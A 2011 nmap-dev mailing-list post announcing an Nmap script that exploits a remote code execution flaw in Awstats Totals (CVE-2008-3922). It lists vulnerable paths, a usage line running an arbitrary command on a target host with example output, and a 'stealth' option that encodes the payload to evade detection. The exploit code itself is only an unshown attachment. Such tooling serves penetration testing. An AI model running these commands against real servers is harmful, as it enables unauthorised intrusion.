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http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14

From: Paulino Calderon <paulino () calderonpale com>
Date: Mon, 11 Jul 2011 02:43:40 -0700

Hi nmap-dev,

description = [[
http-awstatstotals-exec exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it. It works on PHP4 and PHP5 with magic quotes enabled. [CVE: 2008-3922]

  Stealth mode encodes the command string using PHP's chr() function. Ex.
  * Normal mode:
  * Stealth mode:

Common paths for Awstats Total:
* /awstats/index.php
* /awstatstotals/index.php
* /awstats/awstatstotals.php

-- @usage
-- nmap --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.stealth, http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip>
-- @output
-- 80/tcp open  http    syn-ack
-- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
-- @args http-awstatstotals-exec.uri Awstats Totals URI including path
-- @args http-awstatstotals-exec.cmd Command to execute
-- @args http-awstatstotals-exec.stealth Stealth mode encodes command payload using PHP's chr()
-- @args http-awstatstotals-exec.outfile Output file

Paulino Calderón Pale
Web: http://calderonpale.com
Twitter: http://www.twitter.com/paulinocaIderon

Attachment: http-awstatstotals-exec.nse

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